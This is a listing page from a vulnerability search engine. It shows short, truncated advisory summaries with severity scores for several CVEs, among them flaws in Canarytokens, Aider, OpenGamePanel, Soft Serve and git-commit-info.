CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

RedhatCVE•added last week•4 views

CVE-2026-10729

An HTML injection vulnerability in the notification email for "Slow Redirect" and "Cloned Website" Canarytokens exists in Thinkst Applied Research Canarytokens, enabling Interface Manipulation, Cross-Site Scripting XSS in emails clients that render HTML emails. This issue affects Canarytokens: fr...

2.1CVSS5.5AI score0.00062EPSS

Exploits0References1

NVD•added 2026/05/31 9:16 a.m.•11 views

CVE-2026-10174

A vulnerability was identified in Aider-AI Aider 0.86.3. Affected is an unknown function of the file aider/args.py of the component Pre-commit Hook Handler. Such manipulation of the argument git-commit-verify leads to protection mechanism failure. The attack may be launched remotely. The exploit ...

6.5CVSS0.00068EPSS

ATTACKERKB•added 2026/05/31 8:0 a.m.•11 views

CVE-2026-10174

6.5CVSS5.6AI score0.00068EPSS

Exploits0References6Affected Software1

EUVD•added 2026/05/31 8:0 a.m.•10 views

EUVD-2026-33494

Vulnrichment•added 2026/05/31 8:0 a.m.•8 views

CVE-2026-10174 Aider-AI Aider Pre-commit Hook args.py protection mechanism

CVE•added 2026/05/31 8:0 a.m.•16 views

CVE-2026-10174

Summary of CVE-2026-10174 (Aider-AI Aider 0.86.3): Affected is an unknown function in the file aider/args.py of the Pre-commit Hook Handler. Manipulation of the argument git-commit-verify leads to protection mechanism failure. The vulnerability may be exploitable remotely, with exploitation infor...

Positive Technologies•added 2026/05/31 12:0 a.m.•8 views

PT-2026-45183

CNNVD•added 2026/05/31 12:0 a.m.•7 views

Exploits0References7

Aider 安全漏洞

Aider is an open-source terminal AI pair programming tool developed by Aider AI. Version 0.86.3 of Aider contains a security vulnerability. This vulnerability stems from the git-commit-verify operation in the Pre-commit Hook Handler component, which causes the protection mechanism to fail. An...

6.5CVSS6.7AI score0.00068EPSS

Snyk•added 2026/04/01 12:0 a.m.•1 views

Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')

Overview Affected versions of this package are vulnerable to Selection of Less-Secure Algorithm During Negotiation 'Algorithm Downgrade' in the TLS 1.3 session resumption logic if the subsequent ClientHello negotiates TLS 1.2 back. An attacker can gain unauthorized access by impersonating a...

9.1CVSS5.8AI score0.00041EPSS

Snyk•added 2026/03/04 6:55 p.m.•2 views

Incorrect Authorization

Overview openclaw is a 🦞 OpenClaw — Personal AI Assistant Affected versions of this package are vulnerable to Incorrect Authorization in the processing of Slack interactive callbacks, specifically blockaction, viewsubmission, and viewclosed. An attacker can inject unauthorized system-event text...

8.1CVSS5.8AI score0.00042EPSS

CVE•added 2026/02/19 3:41 a.m.•13 views

CVE-2025-15586

OpenGamePanel (OGP-Website) is affected by a type juggling flaw in PHP comparisons present in commits prior to 52f865a4fba763594453068acf8fa9e3fc38d663. If exploited, this can enable authentication bypass without knowledge of the victim’s password. Public references (Red Hat CVE page, NVD entry, ...

10CVSS5.5AI score0.00122EPSS

Exploits0References3

Github Security Blog•added 2025/11/06 11:48 p.m.•7 views

Soft Serve does not sanitize ANSI escape sequences in user input

Impact In several places where the user can insert data e.g. names, ANSI escape sequences are not being removed, which can then be used, for example, to show fake alerts. In the same token, git messages, when printed, are also not being sanitized. Places in which this was found: 1. Repository...

4.6CVSS6.8AI score0.00034EPSS

Exploits0References4Affected Software1

EUVD•added 2025/10/03 8:7 p.m.•7 views

EUVD-2023-1813

Malicious code in bioql PyPI...

9.8CVSS9.2AI score0.00309EPSS

Exploits1References6

Snyk•added 2025/08/13 1:59 p.m.•4 views

Heap-based Buffer Overflow

Overview Affected versions of this package are vulnerable to Heap-based Buffer Overflow via the ReadOneJNGImage function. An attacker can access data on the heap or cause memory corruption by tricking a user into processing a specially crafted image file. Remediation A fix was pushed into the...

7.6CVSS7.1AI score0.00186EPSS

Exploits1References3

Snyk•added 2025/07/10 8:42 p.m.•2 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the Transfer-Encoding: chunked process. An attacker can exhaust server memory resources by sending specially crafted HTTP requests with chunked transfer encoding or without a...

8.7CVSS6.5AI score0.00556EPSS

Exploits1References2

RedhatCVE•added 2025/05/23 3:27 a.m.•6 views

CVE-2023-26134

Versions of the package git-commit-info before 2.0.2 are vulnerable to Command Injection such that the package-exported method gitCommitInfo fails to sanitize its parameter commit, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once...

9.8CVSS7.5AI score0.00309EPSS

Exploits1References1

OSV•added 2025/05/07 12:0 a.m.•2 views

OPENSUSE-SU-2025:15060-1 kanidm-1.6.0~git0.d7ae0f336-1.1 on GA media

These are all security issues fixed in the kanidm-1.6.0git0.d7ae0f336-1.1 package on the GA media of openSUSE Tumbleweed...

3.7CVSS5.8AI score0.00093EPSS